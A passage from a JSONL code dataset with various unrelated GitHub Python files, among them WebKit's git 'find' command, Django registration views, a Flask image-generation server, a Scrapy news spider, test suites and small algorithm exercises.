= True\n if commit.message:\n print(u'Title: {}'.format(commit.message.splitlines()[0]))\n try:\n print(u'Author: {}'.format(commit.author))\n except (UnicodeEncodeError, UnicodeDecodeError):\n print('Error: Unable to print commit author name, please file a bug if seeing this locally.')\n print(datetime.fromtimestamp(commit.timestamp).strftime('Date: %a %b %d %H:%M:%S %Y'))\n if args.verbose > verbose_default or commit.revision:\n print('Revision: {}'.format(commit.revision or 'N/A'))\n if args.verbose > verbose_default or commit.hash:\n print('Hash: {}'.format(commit.hash[:Commit.HASH_LABEL_SIZE] if commit.hash else 'N/A'))\n print(u'Identifier: {}'.format(commit))\n\n if args.verbose > verbose_default:\n for line in commit.message.splitlines():\n print(u' {}'.format(line))\n\n return 0\n\n @classmethod\n def main(cls, args, repository, reference='HEAD', **kwargs):\n if not repository:\n sys.stderr.write('No repository provided\\n')\n return 1\n\n scopes = getattr(args, 'scopes', None)\n\n try:\n if '..' in reference:\n if '...' in reference:\n sys.stderr.write(\"'find' sub-command only supports '..' notation\\n\")\n return 1\n references = reference.split('..')\n if len(references) > 2:\n sys.stderr.write('Can only include two references in a range\\n')\n return 1\n kwargs_to_pass = dict(\n begin=dict(argument=references[0]),\n end=dict(argument=references[1]),\n )\n if scopes:\n if not isinstance(repository, local.Git):\n sys.stderr.write(\"Can only use the '--scope' argument on a native Git repository\\n\")\n return 1\n kwargs_to_pass['scopes'] = scopes\n commits = [commit for commit in repository.commits(**kwargs_to_pass)]\n else:\n if scopes:\n sys.stderr.write('Scope argument invalid when only one commit specified\\n')\n return 1\n commits = [repository.find(reference, include_log=args.include_log)]\n\n except (local.Scm.Exception, TypeError, ValueError) as exception:\n # ValueErrors and Scm exceptions usually contain enough information to be displayed\n # to the user as an error\n sys.stderr.write(str(exception) + '\\n')\n return 1\n\n for commit in commits:\n if args.include_log and args.verbose > 0 and not commit.message:\n sys.stderr.write(\"Failed to find the commit message for '{}'\\n\".format(commit))\n return 1\n\n return cls.print_(args, commits)\n\n\nclass Find(Command):\n name = 'find'\n help = 'Given an identifier, revision or hash, normalize and print the commit'\n aliases = ['list']\n\n @classmethod\n def parser(cls, parser, loggers=None):\n Info.parser(parser, loggers=loggers)\n\n parser.add_argument(\n 'argument', nargs=1,\n type=str, default=None,\n help='String representation of a commit or branch to be normalized',\n )\n parser.add_argument(\n '--scope', '-s',\n help='Filter queries for commit ranges to specific paths in the repository',\n action='append',\n dest='scopes',\n default=None,\n )\n\n @classmethod\n def main(cls, args, repository, **kwargs):\n return Info.main(args, repository=repository, reference=args.argument[0], **kwargs)\n","repo_name":"WebKit/WebKit","sub_path":"Tools/Scripts/libraries/webkitscmpy/webkitscmpy/program/find.py","file_name":"find.py","file_ext":"py","file_size_in_byte":5486,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"} +{"seq_id":"31073102639","text":"from django.conf import settings\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\n\nfrom rest_framework import status\nfrom rest_framework.exceptions import (\n AuthenticationFailed, ErrorDetail, NotAuthenticated, ValidationError)\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom rest_framework_simplejwt.exceptions import InvalidToken\nfrom rest_framework_simplejwt.tokens import RefreshToken\n\nfrom ..models import User\nfrom ..serializers.register import *\nfrom ..utils import Util\n\n\nclass RegisterView(GenericAPIView):\n \"\"\"\n View for taking in a new user's credentials and sending a confirmation email to verify.\n \"\"\"\n serializer_class = RegisterSerializer\n\n def post(self, request):\n \"\"\"\n POST method that performs validation, creates a user instance, and sends a verification email.\n \"\"\"\n verify = request.query_params.get(\n 'verify', settings.FRONT_END_VERIFY_PATHS['REGISTER'])\n serializer = self.serializer_class(data=request.data)\n try:\n serializer.is_valid(raise_exception=True)\n except ValidationError as exc:\n for key, errors in exc.detail.items():\n for error in errors:\n if error.code == f'{key}_exists':\n return Response(exc.detail, status.HTTP_409_CONFLICT)\n return Response(exc.detail, exc.status_code)\n\n user = serializer.save()\n\n Util.send_email_link(\n _('Verify your email address with Icon Syntax'),\n _(\n 'Thank you for registering an account with Icon Syntax! Please follow the link below to complete the registration process. If clicking it does not work, try copying the entire URL and pasting it into your address bar.'\n ),\n user,\n verify)\n\n return Response(\n {\n 'success':\n _(\n 'Step 1 of user registration successful. Check your email for a confirmation link to complete the process.'\n ),\n 'credentials':\n user.credentials\n }, status.HTTP_201_CREATED)\n\n\nclass RegisterVerifyView(GenericAPIView):\n \"\"\"\n View for accepting a generated token from a new user to complete the registration process.\n \"\"\"\n serializer_class = RegisterVerifySerializer\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n \"\"\"\n POST method for taking a token from a query string, checking if it is valid, and marking its associated user's email address as verified.\n \"\"\"\n serializer = self.serializer_class(\n data={}, context={'user': request.user})\n\n try:\n serializer.is_valid(raise_exception=True)\n except ValidationError as exc:\n return Response(exc.detail, exc.status_code)\n\n serializer.save()\n\n return Response(\n {\n 'success':\n _(\n 'You have successfully verified your email address and completed the registration process! You may now access the site\\'s full features.'\n ),\n **serializer.validated_data\n },\n status=status.HTTP_200_OK)\n","repo_name":"McCarthyCode/Icon-Syntax-Back-End","sub_path":"api/authentication/views/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71990753683","text":"import sys\n\nN = int(sys.stdin.readline())\n\narr = list(map(int, sys.stdin.readline().split()))\n\narr.sort()\n\nresult = 0\n\nfor i in range(N):\n target = arr[i]\n\n start = 0\n end = N - 1\n\n while start < end:\n tmp = arr[start] + arr[end]\n\n if tmp < target:\n start += 1\n elif tmp > target:\n end -= 1\n else:\n if start != i and end != i:\n result += 1\n break\n if start == i:\n start += 1\n elif end == i:\n end -= 1\n\nprint(result)\n\n","repo_name":"da-in/algorithm-study","sub_path":"Baekjoon - 문제풀이/좋다/yoonhyeong.py","file_name":"yoonhyeong.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"} +{"seq_id":"21998680760","text":"from PyQt5.QtGui import QImage\nimport os, io\nimport random\nimport threading\nimport argparse, os, sys, glob\nsys.path.append(\".\")\n\nfrom generation_manager import Generator\nfrom flask import Flask, request, send_file, make_response\nfrom flask_lt import run_with_lt\n\napp = Flask(__name__)\nrun_with_lt(app)\n\n@app.route(\"/img2img\", methods=['POST'])\ndef img2img():\n image_data = request.data\n image=QImage(image_data, int(request.args.get(\"w\")), int(request.args.get(\"h\")), QImage.Format_ARGB32)\n flags=request.args.to_dict()\n if 'seed' in flags.keys():\n if (int(flags['seed'])==0):\n flags['seed']=random.randint(0,100000)\n else:\n flags['seed'] = random.randint(0, 100000)\n generation_thread=threading.Thread(target=generator.img2img, args=(flags, image,))\n generation_thread.start()\n return \"OK\"\n\n@app.route(\"/inpaint\", methods=['POST'])\ndef img2imgInpainting():\n image_data = request.data\n image=QImage(image_data, int(request.args.get(\"w\")), int(request.args.get(\"h\")), QImage.Format_ARGB32)\n flags=request.args.to_dict()\n if 'seed' in flags.keys():\n if (int(flags['seed'])==0):\n flags['seed']=random.randint(0,100000)\n else:\n flags['seed'] = random.randint(0, 100000)\n generation_thread = threading.Thread(target=generator.img2imgInpainting, args=(flags, image,))\n generation_thread.start()\n return \"OK\"\n\n@app.route(\"/progress\")\ndef progress():\n args=request.args.to_dict()\n visual=False\n if 'visual' in args.keys():\n visual=args['visual']=='True'\n image, progress = generator.get_progress(visual)\n response=None\n if progress==0 or not visual:\n response=make_response()\n response.headers['X-Progress'] = progress\n if (visual or progress==100) and (progress > 0):\n img_byte_arr = io.BytesIO()\n image.save(img_byte_arr, format='PNG')\n img_byte_arr.seek(0)\n response=make_response(send_file(img_byte_arr,\"image/png\"))\n response.headers['X-Progress'] = progress\n return response\n\n@app.route(\"/txt2img\")\ndef txt2img():\n flags = request.args.to_dict()\n if 'seed' in flags.keys():\n if (int(flags['seed'])==0):\n flags['seed']=random.randint(0,100000)\n else:\n flags['seed'] = random.randint(0, 100000)\n generation_thread = threading.Thread(target=generator.generate, args=(flags,))\n generation_thread.start()\n return \"OK\"\n\ngenerator=Generator()\ngenerator.load_models()\n\napp.run(host=\"0.0.0.0\")\n","repo_name":"anansish/testshit","sub_path":"stable_server.py","file_name":"stable_server.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17910217102","text":"def locate_first(target, string):\n index = 0\n while index < len(string):\n if string[index : index + len(target)] == target:\n return index\n else:\n index += 1\n return -1\n\n\n# Here's a call you can test it with. This should print 4:\nprint(locate_first('ook', 'cookbook'))\nprint(locate_first('base', 'all your bass are belong to us'))\n","repo_name":"PitrsxD/Python-learning","sub_path":"while_locate_first.py","file_name":"while_locate_first.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72930488081","text":"import sqlite3\n\nimport pandas\nfrom django import db\nfrom django.core.management.base import BaseCommand\n\nimport_template = [\n (\"category\", \"reviews_category\", {}, [], []),\n (\n \"comments\",\n \"reviews_comments\",\n {\n \"review\": \"review_id\",\n \"author\": \"author_id\",\n },\n [],\n [],\n ),\n (\"genre_title\", \"reviews_title_genre\", {\"title\": \"titles_id\"}, [], []),\n (\"genre\", \"reviews_genre\", {}, [], []),\n (\n \"review\",\n \"reviews_review\",\n {\n \"title\": \"title_id\",\n \"author\": \"author_id\",\n },\n [],\n [],\n ),\n (\n \"titles\",\n \"reviews_title\",\n {\"category\": \"category_id\"},\n [\n (\"description\", \"change_me\"),\n ],\n [],\n ),\n (\n \"users\",\n \"user_user\",\n {},\n [\n (\"password\", \"change_me\"),\n (\"last_login\", \"2023-06-15 06:02:58.522746\"),\n (\"is_superuser\", False),\n (\"is_staff\", False),\n (\"is_active\", False),\n (\"date_joined\", \"2023-06-15 06:02:58.522746\"),\n (\"confirmation_code\", \"default\"),\n ],\n [],\n ),\n]\n\n\nclass Command(BaseCommand):\n help = \"Import data from local csv files into database.\"\n\n def handle(self, *args, **kwargs):\n db_path = db.utils.settings.DATABASES[\"default\"][\"NAME\"]\n\n conn = sqlite3.connect(db_path)\n c = conn.cursor()\n\n for entry in import_template:\n (file_name, table_name, columns_to_rename,\n columns_to_add, columns_date_modification_type) = entry\n\n c.execute(\n f\"DELETE FROM {table_name};\",\n )\n\n conn.commit()\n\n # давайте предположим, что файлы будут всегда лежать здесь\n df = pandas.read_csv(f\"static/data/{file_name}.csv\")\n\n df.rename(columns=columns_to_rename, inplace=True)\n\n if columns_to_add:\n for column in columns_to_add:\n name, default_value = column\n df.insert(0, name, default_value)\n\n if columns_date_modification_type:\n for column in columns_date_modification_type:\n name, format = column\n df[name] = pandas.to_datetime(df[name], format=format)\n\n df.to_sql(table_name, conn, if_exists=\"append\", index=False)\n\n conn.close()\n\n self.stdout.write(\"Import Complete!\")\n","repo_name":"vyacheslavtarasov/api_yamdb","sub_path":"api_yamdb/reviews/management/commands/dbdataimport.py","file_name":"dbdataimport.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"42409238771","text":"import sys\r\nimport argparse\r\nimport data_processing as dp\r\nimport models\r\nimport evaluation\r\nimport database as db\r\n\r\ndef parse_arguments():\r\n parser = argparse.ArgumentParser(description=\"Train and test ML models with user-provided CSV data.\")\r\n parser.add_argument(\"csv_file\", help=\"Path to the CSV file containing the data.\")\r\n parser.add_argument(\"models\", nargs=\"+\", help=\"List of ML models to use (e.g., RandomForest, LogisticRegression).\")\r\n args = parser.parse_args()\r\n return args.csv_file, args.models\r\n\r\ndef main():\r\n # Parse command-line arguments (CSV file path, ML models, etc.)\r\n csv_file_path, ml_models = parse_arguments()\r\n\r\n # Load and preprocess data\r\n train_data, test_data = dp.load_and_preprocess_data(csv_file_path)\r\n\r\n # Train and test models\r\n results = []\r\n for model_name in ml_models:\r\n model = models.train_model(train_data, model_name)\r\n test_result = models.test_model(test_data, model)\r\n result = evaluation.evaluate(test_result, model_name)\r\n results.append(result)\r\n\r\n # Save results to the MySQL database\r\n db.save_results_to_database(results)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"shoaibswe/ml_model_automation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8437532745","text":"import abc\nfrom typing import Dict, Type\n\nfrom . import codec\nfrom .track import Track, TrackInfo\n\n__all__ = [\"AudioSource\",\n \"audio_source\",\n \"get_source\",\n \"BandCamp\",\n \"Beam\",\n \"Nico\",\n \"SoundCloud\",\n \"Twitch\",\n \"Vimeo\",\n \"Youtube\"]\n\n\nclass AudioSource(abc.ABC):\n \"\"\"Audio source.\"\"\"\n\n def __str__(self) -> str:\n return self.get_name()\n\n @classmethod\n @abc.abstractmethod\n def get_name(cls) -> str:\n \"\"\"Get the name of the audio source.\"\"\"\n ...\n\n @abc.abstractmethod\n def encode(self, track: Track, writer: codec.Writer) -> None:\n \"\"\"Encode the extra details of the source.\"\"\"\n ...\n\n @classmethod\n @abc.abstractmethod\n def decode(cls, info: TrackInfo, reader: codec.Reader):\n \"\"\"Decode the extra details of the source.\"\"\"\n ...\n\n\ndef create_unknown_source(name: str) -> Type[AudioSource]:\n class UnknownSource(AudioSource):\n def __repr__(self) -> str:\n return f\"Unknown({name!r})\"\n\n @classmethod\n def get_name(cls) -> str:\n return name\n\n def encode(self, track: Track, writer: codec.Writer) -> None:\n pass\n\n @classmethod\n def decode(cls, info: TrackInfo, reader: codec.Reader):\n return cls()\n\n return UnknownSource\n\n\n_SOURCES: Dict[str, Type[AudioSource]] = {}\n\n\ndef audio_source(cls=None):\n \"\"\"Decorator to mark a source.\"\"\"\n\n def decorator(cls: Type[AudioSource]):\n _SOURCES[cls.get_name()] = cls\n return cls\n\n if cls is None:\n return decorator\n else:\n return decorator(cls)\n\n\ndef get_source(name: str) -> Type[AudioSource]:\n \"\"\"Get the audio source for the name.\n\n Returns:\n A subclass of `AudioSource` and an unknown source when\n no registered source type (audio sources decorated with `audio_source`)\n was found.\n \"\"\"\n try:\n return _SOURCES[name]\n except KeyError:\n return create_unknown_source(name)\n\n\nclass _BuiltinAudioSource(AudioSource):\n def __repr__(self) -> str:\n return f\"{type(self).__name__}()\"\n\n @classmethod\n def get_name(cls) -> str:\n try:\n name = cls.__source_name__\n except AttributeError:\n name = cls.__source_name__ = cls.__name__.lower()\n\n return name\n\n def __eq__(self, other) -> bool:\n if isinstance(other, _BuiltinAudioSource):\n return self.get_name() == other.get_name()\n else:\n return NotImplemented\n\n def encode(self, track: Track, writer: codec.Writer) -> None:\n pass\n\n @classmethod\n def decode(cls, info: TrackInfo, reader: codec.Reader) -> \"AudioSource\":\n return cls()\n\n\n@audio_source\nclass BandCamp(_BuiltinAudioSource):\n ...\n\n\n@audio_source\nclass Beam(_BuiltinAudioSource):\n __source_name__ = \"beam.pro\"\n\n\n@audio_source\nclass Nico(_BuiltinAudioSource):\n __source_name__ = \"niconico\"\n\n\n@audio_source\nclass SoundCloud(_BuiltinAudioSource):\n ...\n\n\n@audio_source\nclass Twitch(_BuiltinAudioSource):\n ...\n\n\n@audio_source\nclass Vimeo(_BuiltinAudioSource):\n ...\n\n\n@audio_source\nclass Youtube(_BuiltinAudioSource):\n ...\n","repo_name":"gieseladev/lptrack","sub_path":"lptrack/sources.py","file_name":"sources.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36386226554","text":"from unittest.mock import MagicMock, patch\n\nimport pytest\nfrom vectory.db.models import DatasetModel, Query\n\n\n@patch(\"vectory.db.models.DatasetModel.select\", return_value=[])\ndef test_get_dataset_not_found(select_mock: MagicMock):\n \"\"\"Dataset doesn't exist\"\"\"\n\n with pytest.raises(DatasetModel.DoesNotExist):\n Query(DatasetModel).get()\n\n select_mock.assert_called_once_with()\n\n\n@patch(\"vectory.db.models.DatasetModel.select\", return_value=[\"test\", \"test2\"])\ndef test_get_datasets(select_mock: MagicMock):\n \"\"\"Dataset doesn't exist\"\"\"\n\n datasets = Query(DatasetModel).get()\n\n assert len(datasets) == 2\n select_mock.assert_called_once_with()\n\n\n@patch(\"vectory.db.models.os.path.abspath\", return_value=\"test_path_absolute.csv\")\ndef test_get_dataset_conditions(abspath_mock: MagicMock):\n \"\"\"Get datasets\"\"\"\n query_mock = MagicMock()\n query_mock.where = MagicMock(return_value=query_mock)\n\n with patch(\n \"vectory.db.models.DatasetModel.select\", return_value=query_mock\n ) as select_mock:\n with pytest.raises(DatasetModel.DoesNotExist):\n Query(DatasetModel).get(name=\"test\", csv_path=\"test_path_relative.csv\")\n\n select_mock.assert_called_once_with()\n abspath_mock.assert_called_once_with(\"test_path_relative.csv\")\n assert query_mock.where.call_count == 2\n\n expression_first_where = query_mock.where.call_args_list[0][0][0]\n assert expression_first_where.lhs.name == \"name\"\n assert expression_first_where.rhs == \"test\"\n\n expression_second_where = query_mock.where.call_args_list[1][0][0]\n assert expression_second_where.lhs.name == \"csv_path\"\n assert expression_second_where.rhs == \"test_path_absolute.csv\"\n","repo_name":"pentoai/vectory","sub_path":"test/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"3"} +{"seq_id":"17517541577","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFile : config_logging.py\r\nAuthor : GraphLinq Chain\r\nEmail : info@graphlinq.io\r\nWebsite : https://graphlinq.io\r\nRepository : https://github.com/jrbgit/GraphLinq.TelegramBot\r\nDate : 2023-06-20\r\nVersion : 1.1\r\nDescription : Logging Config - Telegram bot for GraphLinq\r\n\"\"\"\r\nimport logging\r\n\r\nloggers = {}\r\n\r\ntelegram_bot_logger = logging.getLogger('telegram')\r\nfile_handler = logging.FileHandler('logs/telegram_bot_debug.log')\r\nformatter = logging.Formatter('[%(levelname)s] [%(asctime)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\r\nfile_handler.setFormatter(formatter)\r\ntelegram_bot_logger.addHandler(file_handler)\r\n\r\n\r\nlog_formats = {\r\n logging.DEBUG: {\r\n 'filename': 'logs/debug.log',\r\n 'encoding': 'utf-8',\r\n 'format': '[DEBUG] [%(asctime)s] %(message)s',\r\n 'datefmt': '%Y-%m-%d %H:%M:%S'\r\n },\r\n logging.INFO: {\r\n 'filename': 'logs/info.log',\r\n 'encoding': 'utf-8',\r\n 'format': '[INFO] [%(asctime)s] %(message)s',\r\n 'datefmt': '%Y-%m-%d %H:%M:%S'\r\n },\r\n logging.WARNING: {\r\n 'filename': 'logs/warning.log',\r\n 'encoding': 'utf-8',\r\n 'format': '[WARNING] [%(asctime)s] %(message)s',\r\n 'datefmt': '%Y-%m-%d %H:%M:%S'\r\n },\r\n logging.ERROR: {\r\n 'filename': 'logs/error.log',\r\n 'encoding': 'utf-8',\r\n 'format': '[ERROR] [%(asctime)s] %(message)s',\r\n 'datefmt': '%Y-%m-%d %H:%M:%S'\r\n },\r\n logging.CRITICAL: {\r\n 'filename': 'logs/critical.log',\r\n 'encoding': 'utf-8',\r\n 'format': '[CRITICAL] [%(asctime)s] %(message)s',\r\n 'datefmt': '%Y-%m-%d %H:%M:%S'\r\n }\r\n}\r\n\r\nfor level, settings in log_formats.items():\r\n logger = logging.getLogger(str(level))\r\n logger.setLevel(level)\r\n\r\n file_handler = logging.FileHandler(filename=settings['filename'], encoding=settings['encoding'])\r\n formatter = logging.Formatter(settings['format'], datefmt=settings['datefmt'])\r\n file_handler.setFormatter(formatter)\r\n\r\n logger.addHandler(file_handler)\r\n loggers[level] = logger\r\n\r\ndef log_debug(message):\r\n loggers[logging.DEBUG].debug(message)\r\n\r\ndef log_info(message):\r\n loggers[logging.INFO].info(message)\r\n\r\ndef log_warning(message):\r\n loggers[logging.WARNING].warning(message)\r\n\r\ndef log_error(message):\r\n loggers[logging.ERROR].error(message)\r\n\r\ndef log_critical(message):\r\n loggers[logging.CRITICAL].critical(message)\r\n\r\n","repo_name":"jrbgit/GraphLinq.TelegramBot","sub_path":"config_logging.py","file_name":"config_logging.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"12687412466","text":"from random import choice, sample\nfrom numpy import array\n\nx = list(range(0,100000))\n\n\ndef lister():\n\tx = list(range(0,100000))\n\n\ty = sample(x, 10000) \n\ty.sort()\n\ty.reverse()\n\n\tfor pop in y:\n\t\tx.pop(pop)\n\n\ndef arrayer():\n\tx = list(range(0,100000))\n\n\ty=[]\n\tfor i in range(0, len(x)):\n\t\ty.append(choice([True, False]))\n\tx = array(x)\n\tx = x[y]\n\n#lister()\narrayer()\n","repo_name":"csoeder/Human-Denovo-Polymorphs","sub_path":"scripts/poptest.py","file_name":"poptest.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13355358302","text":"arquivo = open('/home/renato/Área de Trabalho/Projeto Xakriabá/indces escolas indigenas/ind.txt','r') #MATRICULA_SUDESTE\nresultado= open('/home/renato/Área de Trabalho/Projeto Xakriabá/indces escolas indigenas/indice_Turmas 2008.txt','w')\nresultado= open('/home/renato/Área de Trabalho/Projeto Xakriabá/indces escolas indigenas/indice_Turmas 2008.txt','a')\n\ncontador=0\ncontador2=0\nn=0\nfor linha in arquivo:\n linha=linha.rstrip()\n x = linha.split(\"|\")\n while n!=-1:\n\n\n contador=contador+1\n resultado.write(x[n]+'\\n')\n n=n+1\n\n\n\narquivo.close()\nresultado.close()\nprint('EXIT SUSSESS')\nprint('foram encontradas ',contador,' resultados')","repo_name":"Renatolopo/Banco-de-dados-inep","sub_path":"Scripts/indices.py","file_name":"indices.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12663229369","text":"import base64\n\nfrom django.contrib.sites.models import Site\nfrom django.core import mail\nfrom django.utils.six.moves import cPickle as pickle\nfrom django.test import TestCase\nfrom django.test.utils import override_settings\n\nfrom ..conf import settings\nfrom ..models import NoticeType, NoticeQueueBatch, NoticeSetting\nfrom ..models import LanguageStoreNotAvailable\nfrom ..models import get_notification_language, send_now, send, queue\nfrom ..compat import get_user_model\n\nfrom .models import Language\n\nfrom . import get_backend_id\n\n\nclass BaseTest(TestCase):\n def setUp(self):\n self.user = get_user_model().objects.create_user(\"test_user\", \"test@user.com\", \"123456\")\n self.user2 = get_user_model().objects.create_user(\"test_user2\", \"test2@user.com\", \"123456\")\n NoticeType.create(\"label\", \"display\", \"description\")\n self.notice_type = NoticeType.objects.get(label=\"label\")\n\n def tearDown(self):\n self.user.delete()\n self.user2.delete()\n self.notice_type.delete()\n\n\nclass TestNoticeType(TestCase):\n\n def test_create(self):\n label = \"friends_invite\"\n NoticeType.create(label, \"Invitation Received\", \"you received an invitation\", default=2,\n verbosity=2)\n n = NoticeType.objects.get(label=label)\n self.assertEqual(str(n), label)\n # update\n NoticeType.create(label, \"Invitation for you\", \"you got an invitation\", default=1,\n verbosity=2)\n n = NoticeType.objects.get(pk=n.pk)\n self.assertEqual(n.display, \"Invitation for you\")\n self.assertEqual(n.description, \"you got an invitation\")\n self.assertEqual(n.default, 1)\n\n\nclass TestNoticeSetting(BaseTest):\n def test_for_user(self):\n email_id = get_backend_id(\"email\")\n notice_setting = NoticeSetting.objects.create(\n user=self.user,\n notice_type=self.notice_type,\n medium=email_id,\n send=False\n )\n self.assertEqual(\n NoticeSetting.for_user(self.user, self.notice_type, email_id, scoping=None),\n notice_setting\n )\n\n # test default fallback\n NoticeSetting.for_user(self.user2, self.notice_type, email_id, scoping=None)\n ns2 = NoticeSetting.objects.get(user=self.user2, notice_type=self.notice_type, medium=email_id)\n self.assertTrue(ns2.send)\n\n\nclass TestProcedures(BaseTest):\n def setUp(self):\n super(TestProcedures, self).setUp()\n self.lang = Language.objects.create(user=self.user, language=\"en_US\")\n mail.outbox = []\n\n def tearDown(self):\n super(TestProcedures, self).tearDown()\n self.lang.delete()\n NoticeQueueBatch.objects.all().delete()\n\n @override_settings(PINAX_NOTIFICATIONS_LANGUAGE_MODEL=\"tests.Language\")\n def test_get_notification_language(self):\n self.assertEqual(get_notification_language(self.user), \"en_US\")\n self.assertRaises(LanguageStoreNotAvailable, get_notification_language, self.user2)\n setattr(settings, \"PINAX_NOTIFICATIONS_LANGUAGE_MODEL\", None)\n self.assertRaises(LanguageStoreNotAvailable, get_notification_language, self.user)\n\n @override_settings(SITE_ID=1, PINAX_NOTIFICATIONS_LANGUAGE_MODEL=\"tests.Language\")\n def test_send_now(self):\n Site.objects.create(domain=\"localhost\", name=\"localhost\")\n users = [self.user, self.user2]\n send_now(users, \"label\")\n self.assertEqual(len(mail.outbox), 2)\n self.assertIn(self.user.email, mail.outbox[0].to)\n self.assertIn(self.user2.email, mail.outbox[1].to)\n\n @override_settings(SITE_ID=1)\n def test_send(self):\n self.assertRaises(AssertionError, send, queue=True, now=True)\n\n users = [self.user, self.user2]\n send(users, \"label\", now=True)\n self.assertEqual(len(mail.outbox), 2)\n self.assertIn(self.user.email, mail.outbox[0].to)\n self.assertIn(self.user2.email, mail.outbox[1].to)\n\n send(users, \"label\", queue=True)\n self.assertEqual(NoticeQueueBatch.objects.count(), 1)\n batch = NoticeQueueBatch.objects.all()[0]\n notices = pickle.loads(base64.b64decode(batch.pickled_data))\n self.assertEqual(len(notices), 2)\n\n @override_settings(SITE_ID=1)\n def test_send_default(self):\n # default behaviout, send_now\n users = [self.user, self.user2]\n send(users, \"label\")\n self.assertEqual(len(mail.outbox), 2)\n self.assertEqual(NoticeQueueBatch.objects.count(), 0)\n\n @override_settings(SITE_ID=1)\n def test_queue_queryset(self):\n users = get_user_model().objects.all()\n queue(users, \"label\")\n self.assertEqual(len(mail.outbox), 0)\n self.assertEqual(NoticeQueueBatch.objects.count(), 1)\n","repo_name":"haystack/eyebrowse-server","sub_path":"notifications/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"3"} +{"seq_id":"30126948858","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\nfrom baidunews.items import BaidunewsItem\nimport re\nfrom scrapy.http import Request\n\nclass NewsSpider(scrapy.Spider):\n name = \"news\"\n #allowed_domains = [\"baidu.com\"]\n start_urls = ['http://baidu.com/']\n # 网站分类\n allid = ['LocalHouseNews', 'LocalNews']\n # 构造请求地址\n allurl = []\n for i in range(0, len(allid)):\n thisurl = \"http://news.baidu.com/widget?id=\" + allid[i] + \"&ajax=json\"\n allurl.append(thisurl)\n def parse(self, response):\n for j in range(0, len(self.allurl)):\n print(\"正在爬取第\" + str(j) + \"个栏目\")\n yield Request(self.allurl[j], callback = self.getData1)\n # 处理爬取到的数据\n def getData1(self, response):\n data = response.body.decode('utf-8', 'ignore')\n pat1 = '\"m_relate_url\":\"(.*?)\"'\n pat2 = '\"url\":\"(.*?)\"'\n # 提取json串中的文章url地址\n url1 = re.compile(pat1, re.S).findall(data)\n url2 = re.compile(pat2, re.S).findall(data)\n if(len(url1) != 0):\n url = url1\n else:\n url = url2\n for k in range(0, len(url)):\n articleurl = url[k]\n # 处理url中转义符号\\/\\/\n articleurl = re.sub('\\\\\\/', '/', articleurl)\n yield Request(articleurl, callback = self.getData2)\n def getData2(self, response):\n item = BaidunewsItem()\n item['link'] = response.url\n item['title'] = response.xpath(\"/html/head/title/text()\").extract()\n item['content'] = response.body\n yield item","repo_name":"gaoyaqiu/python-spider","sub_path":"baidunews/baidunews/spiders/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"3"} +{"seq_id":"17940982473","text":"import torch\nimport numpy as np\nfrom torchvision import datasets, transforms\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\n\ndef get_train_valid_dataset(train_batch=64, valid_batch=None):\n \"\"\"\n Creates a trainings and cross-validation dataset out of the original train dataset. The validation set contains\n 10,000 images and the test set contains 50,000 images.\n\n :param train_batch: The size of each training set batch.\n :param valid_batch: The size of each validation set batch.\n :return: train_dataset: The dataset that is used for training of the network.\n :return: valid_dataset: The dataset that is used for the cross validation in the network.\n \"\"\"\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n\n dataset = datasets.MNIST('./dataset', train=True, download=True, transform=transform)\n # valid_dataset = datasets.MNIST('../data', train=True, download=True, transform=transform)\n\n # Creating data indices for training and validation splits:\n dataset_size = len(dataset)\n indices = list(range(dataset_size))\n split = 10000\n\n # shuffle dataset\n np.random.seed(0)\n np.random.shuffle(indices)\n train_indices, val_indices = indices[split:], indices[:split]\n\n # Creating PT data samplers and loaders:\n train_sampler = SubsetRandomSampler(train_indices)\n valid_sampler = SubsetRandomSampler(val_indices)\n\n if valid_batch is None:\n btx = split\n else:\n btx = valid_batch\n\n # create loader for train and validation sets\n train_loader = torch.utils.data.DataLoader(dataset, batch_size=train_batch, 